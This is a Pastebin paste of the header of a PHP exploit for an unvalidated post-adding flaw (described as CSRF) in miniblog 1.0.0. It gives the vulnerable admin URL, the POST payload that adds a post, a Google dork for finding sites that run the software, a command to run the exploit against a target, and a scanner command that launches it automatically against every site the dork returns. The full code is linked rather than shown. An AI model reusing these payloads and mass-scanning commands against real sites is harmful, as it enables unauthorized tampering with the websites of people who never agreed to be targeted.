Advertisement
Googleinurl

[EXPLOIT] miniblog 1.0.0 CSRF 4ADD post / INURL BRASIL

May 2nd, 2015
2,100
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. /*
  4.   [+] Discoverer Author: Mustafa Moshkela
  5.   REF COD POC: http://www.exploit4arab.net/exploits/1482
  6.   Greets to: all members in iq-team.org
  7.   ------------------------------------------------------------------------------
  8.  
  9.   # SCRIPT by:     [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  10.   # EXPLOIT NAME:  XPL miniblog 1.0.0 CSRF 4ADD post / INURL BRASIL
  11.   # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  12.   # Email:         inurlbr@gmail.com
  13.   # Blog:          http://blog.inurl.com.br
  14.   # Twitter:       https://twitter.com/googleinurl
  15.   # Fanpage:       https://fb.com/InurlBrasil
  16.   # Pastebin       http://pastebin.com/u/Googleinurl
  17.   # GIT:           https://github.com/googleinurl
  18.   # PSS:           http://packetstormsecurity.com/user/googleinurl
  19.   # YOUTUBE:       http://youtube.com/c/INURLBrasil
  20.   # PLUS:          http://google.com/+INURLBrasil
  21.   ------------------------------------------------------------------------------
  22.  
  23.   # DATA SUBMISSION WITHOUT VALIDATION
  24.  
  25.   # Vendor:        http://www.spyka.net/scripts/php/miniblo
  26.  
  27.   # Google Dork:   intext:"Powered by miniblog" ext:php
  28.  
  29.   # POC:           http://{YOU_URL}/adm/admin.php?mode=add
  30.  
  31.   # SEND REQUEST POST
  32.   adddata[post_title]=TITLE&data[post_content]=<b>YOU_POST</b>&data[published]=1&miniblog_PostBack=Add
  33.   ------------------------------------------------------------------------------
  34.  
  35.   # EXECUTE:       php xpl.php -t http://target.us
  36.  
  37.   # FILE_OUTPUT :  miniblog_vuln.txt
  38.  
  39.   # EXPLOIT MASS USE SCANNER INURLBR
  40.   php inurlbr.php --dork 'intext:"Powered by miniblog" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'
  41.   More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
  42.   ------------------------------------------------------------------------------
  43.  
  44.  
  45.  */
  46. ACESSO EXPLOIT CODE-->>> https://github.com/googleinurl/miniblog-1.0.0-CSRF-4ADD-post-INURL-BRASIL
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement